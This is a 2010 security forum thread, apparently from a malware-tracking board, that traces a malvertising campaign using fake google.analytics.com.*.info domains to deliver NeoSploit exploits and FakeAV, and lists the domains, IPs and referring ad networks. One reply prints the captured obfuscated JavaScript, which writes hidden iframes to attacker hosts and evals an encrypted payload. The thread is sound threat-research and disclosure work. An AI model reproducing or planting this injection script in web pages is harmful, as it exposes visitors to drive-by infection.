Author Topic: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By  (Read 12745 times)


February 26, 2010, 05:12:30 pm

eoin.miller

Seeing quite a few clients hitting this host:

http://google.analytics.com.tklaxlxvedkt.info/

Directories are all over the place:
/kav/kav3%20.asp/
/kav/kav3.exe/
/kav/kav3.php/
/kavo/avorp1kav3%20.asp/
/kavo/avorp1kav3.py/
/kavs/kav6.php/
/nte/avorp1kav6.php/
/kav/kav3.py/
/kavs/kav6%20.asp/

Serving up PDFs, Java classes, and also FakeAV. The FakeAV is being downloaded with the Java user agent after the malicious classes that are served up finish executing.

FakeAV binary location:
google.analytics.com.tklaxlxvedkt.info/kav/kav3.php/eHc8d7c382V0100f070006R8db29656102T8351602d201l0409K71925c29303J030006010

VirusTotal.com Report:
http://www.virustotal.com/analisis/fa1df643d780e7f13b35981283940c4e2b5d3f053706ab03be90fc2a38bd9d7e-1267199064

February 26, 2010, 05:29:09 pm
Reply #1

SysAdMini

It is a NeoSploit exploit kit and distributes fake av.
Ruining the bad guy's day

February 26, 2010, 07:51:24 pm
Reply #2

eoin.miller

Found a bunch more:

google.analytics.com.jklnznqvztu.info
google.analytics.com.tluaweyermg.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.zugponkeqtzz.info

All resolve to the same IP:

75.125.183.50

March 01, 2010, 06:33:03 pm
Reply #3

eoin.miller

More:

google.analytics.com.hzlyaejcvmat.info - 69.174.245.150
google.analytics.com.lsvoenxxyya.info - 69.174.245.148
google.analytics.com.dbvvwrkgycfa.info - 69.174.245.147
google.analytics.com.yfguydudorip.info - 69.174.245.147
google.analytics.com.dcghkoixsagu.info - 72.51.41.155
google.analytics.com.gopbaqvgprvh.info - 72.51.41.155
google.analytics.com.dygpcewrjnw.info - 69.174.245.147
google.analytics.com.inxvwrxogrc.info - 69.174.245.150
google.analytics.com.kijksoeohxze.info - 72.51.41.155
google.analytics.com.prtrkmxkpctw.info - 75.125.183.50




March 01, 2010, 09:45:05 pm
Reply #4

eoin.miller

Total found so far again:


google.analytics.com.byuigracdnjj.info
google.analytics.com.cvybexpnqhlx.info
google.analytics.com.dbvvwrkgycfa.info
google.analytics.com.dcghkoixsagu.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.dygpcewrjnw.info
google.analytics.com.eliyisgtkaj.info
google.analytics.com.gopbaqvgprvh.info
google.analytics.com.hzlyaejcvmat.info
google.analytics.com.inxvwrxogrc.info
google.analytics.com.jgvsjnhmvngn.info
google.analytics.com.jklnznqvztu.info
google.analytics.com.jttyhhvcxmbz.info
google.analytics.com.kijksoeohxze.info
google.analytics.com.lsvoenxxyya.info
google.analytics.com.omvdbdcknpct.info
google.analytics.com.prtrkmxkpctw.info
google.analytics.com.pzignbfxspou.info
google.analytics.com.qlgkmytdvyjx.info
google.analytics.com.tklaxlxvedkt.info
google.analytics.com.tluaweyermg.info
google.analytics.com.uuyvsrbtpjhl.info
google.analytics.com.xkduqnxfpnfg.info
google.analytics.com.yfguydudorip.info
google.analytics.com.yggxvnwumcqv.info
google.analytics.com.yhaidebpfltr.info
google.analytics.com.zelhnalbivd.info
google.analytics.com.zugponkeqtzz.info

March 01, 2010, 11:30:10 pm
Reply #5

eoin.miller

This seems to be pretty widespread. The list of referrers is pretty extensive, looks like some advertising services did some business with some unsavory characters again.


Some of the referring domains to the collection of malicious google.analytics.*.info domains:

Code:
ad.doubleclick.net
ad.yieldmanager.com
articles.moneycentral.msn.com
astrocenter.astrology.msn.com
autos.kosmix.com
autos.msn.com
blogs2.startribune.com
boards.msn.com
community.foxsports.com
creative.adonion.com
creative.clicksor.com
cyclops.prod.untd.com
data.cnbc.com
digg.com
eb.adbureau.net
entertainment.msn.com
environment-msnbc.newsvine.com
fordtruckworld.tenmagazines.com
gasbuddy.com
health.msn.com
integration.mtvnservices.com
lifestyle.msn.com
local.msn.com
mbd.scout.com
media.bannerimg.com
media.www.gwhatchet.com
moneycentral.msn.com
msn.careerbuilder.com
msn.foxsports.com
music.msn.com
my.juno.com
my.msn.com
nbcsports.newsvine.com
pd.startribune.com
player.jambovideonetwork.com
pr1.shoe-metro.us
profootball.scout.com
rad.msn.com
realestate.msn.com
ro-d.redorbit.com
secret5trading.com
showbiz411.blogs.thr.com
splashpage.mtv.com
tag.admeld.com
tennessee.scout.com
tv.msn.com
video.bobvila.com
view.atdmt.com
weather.msn.com
wonderwall.msn.com
worldblog.msnbc.msn.com
www.bobvila.com
www.business.com
www.buy.com
www.cheboygannews.com
www.cnbc.com
www.delish.com
www.evite.com
www.greatschools.org
www.heatvisionblog.com
www.hollywoodreporter.com
www.kob.com
www.legacy.com
www.merriam-webster.com
www.msnbc.msn.com
www.paperbackswap.com
www.redorbit.com
www.retrevo.com
www.soapcentral.com
www.startribune.com
www.thebluebanner.net
www.thelantern.com
www.theobr.com
www.thrfeed.com
www.tvland.com
www.upi.com
www.wunderground.com

March 02, 2010, 04:58:08 pm
Reply #6

eoin.miller

Two more:

google.analytics.com.uentfkblzpxx.info
google.analytics.com.uwbhpcrydgta.info

March 03, 2010, 05:19:10 pm
Reply #7

eoin.miller

Turned a bunch of info over to some experts and they are tracking down the malvertising and trying to identify the affiliates. This was described as a "nest o' badness" and I do not think that is an understatement. Hopefully I will have a larger list of domains/IPs contributing to this.

March 03, 2010, 07:11:02 pm
Reply #8

eoin.miller


March 04, 2010, 10:01:18 pm
Reply #9

eoin.miller

After conversations with US-CERT, they will be publishing an alert about this tomorrow/Monday.

March 07, 2010, 08:02:11 am
Reply #10

eoin.miller

So I finally found the javascript causing the requests to go to the google.analytics.com.*.info domains. It appears that javascript coming back from adrotator.mediaplex.feed-mnptr.com had encoded+obfuscated+encrypted javascript that redirects people to the google.analytics.com.*.info domains.

Here is the portion of the malicious javascript that it was serving up previously:
Code:
var RSA={encrypt:function(m,e,n){m=BASE64.encode(m);var asci=[],coded='';for(var i=0;i<m.length;i+=3){var tmpasci='1';for(var h=0;h<3;h++){if(i+h<m.length){tmpstr=this.ord(m.charAt(i+h))-30;if(tmpstr.length<2)tmpstr='0'+tmpstr;}else break;tmpasci+=tmpstr;}asci.push(tmpasci+'1')}for(var k=0;k<asci.length;k++){var resultmod=this.powmod(asci[k],e,n);var chunk=resultmod.toString(16);while(chunk.length<7)chunk='0'+chunk;coded+=chunk}coded=coded.replace(new RegExp('^+|+$','g'),'');return this.hexstr(coded)},decrypt:function(c,d,n){c=this.strhex(c);var decryptarray=[],deencrypt='',resultd='';for(var i=0;i<c.length;i+=7)decryptarray.push(c.substr(i,7));for(var u=0;u<decryptarray.length;u++)if(decryptarray[u]=='')decryptarray.splice(u,1);for(var u=0;u<decryptarray.length;u++){var resultmod=this.powmod(parseInt(decryptarray[u],16),d,n)+'';deencrypt+=resultmod.substr(1,resultmod.length-2)}for(var u=0;u<deencrypt.length;u+=2)resultd+=this.chr(parseInt(deencrypt.substr(u,2),10)+30);return BASE64.decode(resultd)},ord:function(chr){return ASCII.ord(chr)},chr:function(num){return ASCII.chr(num)},mod:function(g,l){return g-(l * Math.floor(g/l))},powmod:function(base,exp,modulus){var accum=1,i=0,basepow2=base;while((exp>>i)>0){if(((exp>>i)&1)==1)accum=this.mod((accum * basepow2),modulus);basepow2=this.mod((basepow2 * basepow2),modulus);i++}return accum},hexstr:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i+=2){var bte=parseInt(''+str.charAt(i)+str.charAt(i+1),16).toString(10);result+=ASCII.chr(bte)}return result},strhex:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i++){var bte=ASCII.ord(str.charAt(i)).toString(16);result+=bte.length==2?bte:'0'+bte;}return result}};var 
ASCII={translations:{js2php:{1026:128,1027:129,8218:130,1107:131,8222:132,8230:133,8224:134,8225:135,8364:136,8240:137,1033:138,8249:139,1034:140,1036:141,1035:142,1039:143,1106:144,8216:145,8217:146,8220:147,8221:148,8226:149,8211:150,8212:151,65533:152,8482:153,1113:154,8250:155,1114:156,1116:157,1115:158,1119:159,1038:161,1118:162,1032:163,1168:165,1025:168,1028:170,1031:175,1030:178,1110:179,1169:180,1105:184,8470:185,1108:186,1112:188,1029:189,1109:190,1111:191,1040:192,1041:193,1042:194,1043:195,1044:196,1045:197,1046:198,1047:199,1048:200,1049:201,1050:202,1051:203,1052:204,1053:205,1054:206,1055:207,1056:208,1057:209,1058:210,1059:211,1060:212,1061:213,1062:214,1063:215,1064:216,1065:217,1066:218,1067:219,1068:220,1069:221,1070:222,1071:223,1072:224,1073:225,1074:226,1075:227,1076:228,1077:229,1078:230,1079:231,1080:232,1081:233,1082:234,1083:235,1084:236,1085:237,1086:238,1087:239,1088:240,1089:241,1090:242,1091:243,1092:244,1093:245,1094:246,1095:247,1096:248,1097:249,1098:250,1099:251,1100:252,1101:253,1102:254,1103:255},php2js:{128:1026,129:1027,130:8218,131:1107,132:8222,133:8230,134:8224,135:8225,136:8364,137:8240,138:1033,139:8249,140:1034,141:1036,142:1035,143:1039,144:1106,145:8216,146:8217,147:8220,148:8221,149:8226,150:8211,151:8212,152:65533,153:8482,154:1113,155:8250,156:1114,157:1116,158:1115,159:1119,161:1038,162:1118,163:1032,165:1168,168:1025,170:1028,175:1031,178:1030,179:1110,180:1169,184:1105,185:8470,186:1108,188:1112,189:1029,190:1109,191:1111,192:1040,193:1041,194:1042,195:1043,196:1044,197:1045,198:1046,199:1047,200:1048,201:1049,202:1050,203:1051,204:1052,205:1053,206:1054,207:1055,208:1056,209:1057,210:1058,211:1059,212:1060,213:1061,214:1062,215:1063,216:1064,217:1065,218:1066,219:1067,220:1068,221:1069,222:1070,223:1071,224:1072,225:1073,226:1074,227:1075,228:1076,229:1077,230:1078,231:1079,232:1080,233:1081,234:1082,235:1083,236:1084,237:1085,238:1086,239:1087,240:1088,241:1089,242:1090,243:1091,244:1092,245:1093,246:1094,247:1095,248:1096,249:1097,250:1098,251:1099,252:1100,253:1101,254:1102,255:1103}},ord:function(chr,dir){dir=dir||'js2php';if(!this.translations[dir])return null;chr=chr.charCodeAt(0);return(chr in this.translations[dir])?this.translations[dir][chr]:chr},chr:function(ord,dir){dir=dir||'php2js';if(!this.translations[dir])return null;ord=(ord in this.translations[dir])?this.translations[dir][ord]:ord;return String.fromCharCode(ord)}};var BASE64={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;while(i<input.length){chr1=ASCII.ord(input.charAt(i++));chr2=ASCII.ord(input.charAt(i++));chr3=ASCII.ord(input.charAt(i++));enc1=chr1>>2;enc2=((chr1&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2))enc3=enc4=64;else if(isNaN(chr3))enc4=64;output=output+this.alphabet.charAt(enc1)+this.alphabet.charAt(enc2)+this.alphabet.charAt(enc3)+this.alphabet.charAt(enc4)}return output},decode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;input=input.replace(new RegExp('[^A-Za-z0-9+/=]','g'),'');while(i<input.length){enc1=this.alphabet.indexOf(input.charAt(i++));enc2=this.alphabet.indexOf(input.charAt(i++));enc3=this.alphabet.indexOf(input.charAt(i++));enc4=this.alphabet.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2 & 15)<<4)|(enc3>>2);chr3=((enc3 & 3)<<6)|enc4;output=output+ASCII.chr(chr1);if(enc3!=64)output=output+ASCII.chr(chr2);if(enc4!=64)output=output+ASCII.chr(chr3)}return output}}


statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

var cd1 = "adr";
var cd2 = "otator.m";
var cd3 = "ediaplex.feed-mnptr.com";
var cur_domain = cd1 + cd2 + cd3;
       var all_t = "1,2,3,4,5,6,7,8,9";
       var mtch = all_t.match(statictml);
if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=260233594&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
                              
//
var jse1 = "htt"; var jse2 = "p://adr"; var jse3 = "otator.mediaple"; var jse4 = "x.feed-mnptr.com/stats_js_e.php?id=260233594";
var jse = jse1 + jse2 + jse3 + jse4;
document.write(unescape("%3Ciframe src='" + jse + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//


eval(RSA.decrypt('1c8e162194ee9b0fc499a16b2e423b376922958cda38cd50234229fa051a0742ecf1c22b4894d2e1526c13d66570af6256039b11934eaaa6292067d2e092b70a18b1f21422f606dd839108925e32edb3c316a1d7242708a29c620325137ca2170bc4003a6072c3fdbf2da9fd729c5fcd0af3295172a40d353fef13d30c2e044bc912eb149614207741efaa850d799412b990931f3efba394928b1aa73c32c4712c25f77662aec8d22a2da282879a040aa84f20f3083c2d7b4d30a7e0b52e1a1e22b00afd0e914113ccbe4d0c5bfa31568b7317633401ba627919dde2e066c9ea1d7147f0a9b7f813693ac31330201dd064925c196902237f21708460182ccd8113e527','14947943','64253471'));

}

All of this javascript just causes the following to get written into the document:

Code:
<iframe width="1" height="1" style="visibility: hidden;" src="http://google.analytics.com.hzlyaejcvmat[dot]info/ld/kav2/"></iframe>

The registration stuff on feed-mnptr.com seems suspect:

Domain name: feed-mnptr.com

Registrant Contact:
   ReligionSeeke
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Administrative Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Technical Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Billing Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

DNS:
free01.editdns.net
free02.editdns.net

Created: 2010-01-30
Expires: 2011-01-30

Something very fishy going on....




March 24, 2010, 02:03:10 pm
Reply #11

jboyhb

More:

IP: 66.135.41.32

google.analytics(dot)com.mdmnegsxcytq.info/kav/kav5.php
google.analytics(dot)com.mdmnegsxcytq.info/kav/KAV5.py/oH5100219cV0100f036002R22c9ccec102T1aaa3015Q000002fa901801F0016000aJ11000601l0409K5b577271317

Wepawet:
benign

jsunpack:
Malicious
http://jsunpack.eyeprotectiongroup.com/dec/go?report=9b1a7c8123b3f0fa1a4225b6150fb7ca55c15823


March 25, 2010, 11:12:42 pm
Reply #12

mwollenweber

Does anyone have a sample of the PDF? It seems like the kav executable is after successful exploitation by the PDF. However, I have a Mac that downloaded the executable but I can't find the PDF on disk (yet). Has anyone seen it work on OS X? And if you have a sample please let me know. Thanks.

April 30, 2010, 04:35:52 pm
Reply #13

eoin.miller

Yahoo! is still doing business with some of these people apparently.

Request:
Code:
GET /cust.php?n=cust3 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/m
sword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xba
p, application/x-ms-application, */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdANplCgCfIksAAAAAAB-FFAAAAAAAAgAEA
AYAAAAAAP8AAAAGC1RkEgAAAAAAHZ0KAAAAAABvxxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAHYgUAAAAAAAIAAwAAAAAAH4XrUbge3T8fhetRuB7dPx-F61G4Ht0.H4XrUbg
e3T8AAAAAAADwPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO5nMQqMkjCOVE
-tNHXz8ZdCqW3h6dqVv9AKFTAAAAAA==,http%3A%2F%2Fd.tradex.openx.com%2Fck.php%3Foapar
ams%3D2__bannerid%3D2643__zoneid%3D1829__cb%3Da0101f785d__r_id%3D38f962825de0b640
a8012aa1fa0e632f__r_ts%3Dl1p0rs__oadest%3D%24,http%3A%2F%2Fd.tradex.openx.com%2Fa
fr.php%3Frefresh%3D45%26zoneid%3D1829%26cb%3Dinsert_random_number_here%26loc%3Dht
tp%253a%252f%252fd.tradex.openx.com%252fafr.php%253fzoneid%253d1826%2526cb%253din
sert_random_number_here,Z%3D728x90%26x%3Dhttp%253A%252F%252Fd%252Etradex%252Eopen
x%252Ecom%252Fck%252Ephp%253Foaparams%253D2%255F%255Fbannerid%253D2643%255F%255Fz
oneid%253D1829%255F%255Fcb%253Da0101f785d%255F%255Fr%255Fid%253D38f962825de0b640a
8012aa1fa0e632f%255F%255Fr%255Fts%253Dl1p0rs%255F%255Foadest%253D%24%26s%3D681434
%26_salt%3D237608200%26B%3D10%26u%3Dhttp%253A%252F%252Fd.tradex.openx.com%252Fafr
.php%253Frefresh%253D45%2526zoneid%253D1829%2526cb%253DINSERT_RANDOM_NUMBER_HERE%
2526loc%253Dhttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Fzonei
d%25253D1826%252526cb%25253DINSERT_RANDOM_NUMBER_HERE%26r%3D0,5372d202-5462-11df-
80ae-001e6849f50f
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Host: sefito.com
Connection: Keep-Alive

Response:
Code:
HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 30 Apr 2010 14:11:54 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 158
<html>
<body>

<iframe src="http://google.analytics.com.uwyovhxythol.info/ld/kav4/" style="visib
ility:hidden;" width="1" height="1"></iframe>

</body>
</html>

Looks like they are adding intermediary domains between the two now sometimes. This is not nearly as widespread as before, but still way too many people use Yieldmanager's advertising service and are potentially infecting their clients. Google too, via DoubleClick.net:

Code:
GET /ld/kav4/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.m
s-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms
-powerpoint, application/msword, */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-425659629246
7410&output=html&h=90&slotname=3697413835&w=728&ea=0&flash=10.0.32.18&url=http%3A
%2F%2Fwww.sparkpeople.com%2Fresource%2Fgames_trivia.asp&dt=1272580330993&shv=r201
00414&correlator=1272580330993&frm=1&ga_vid=714073391.1263411881&ga_sid=127258007
9&ga_hid=2005532139&ga_fc=1&u_tz=-360&u_his=36&u_java=0&u_h=1050&u_w=1680&u_ah=10
00&u_aw=1680&u_cd=32&u_nplug=0&u_nmime=0&biw=814&bih=779&ifk=1157504475&fu=4&ifi=
1&dtd=78
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; MS-R
TC LM 8)
Host: google.analytics.com.vdifjlhzgas.info
Connection: Keep-Alive


domains to add to the list:
sefito.com - redirects to malvertising hosts.

google.analytics.com.aojegqdnwjvj.info
google.analytics.com.arffzejadvl.info
google.analytics.com.atdvtodlubs.info
google.analytics.com.fhccvgjohscc.info
google.analytics.com.ggfinekjvfmg.info
google.analytics.com.gijiinhivudu.info
google.analytics.com.ltxmklkxkuh.info
google.analytics.com.meejnagyeuzi.info
google.analytics.com.rqpqgqyjlmex.info
google.analytics.com.scvepuxdfzar.info
google.analytics.com.tbuygryyutcj.info
google.analytics.com.uwyovhxythol.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.waolovbichmz.info
google.analytics.com.zfnefclseth.info

All have resolved to 67.18.213.122 over the last week.

May 03, 2010, 02:34:11 pm
Reply #14

eoin.miller

More on 67.18.213.122 :

google.analytics.com.pswdypsaxtqh.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.sxyayfphgqfo.info
google.analytics.com.mpmygrdjymz.info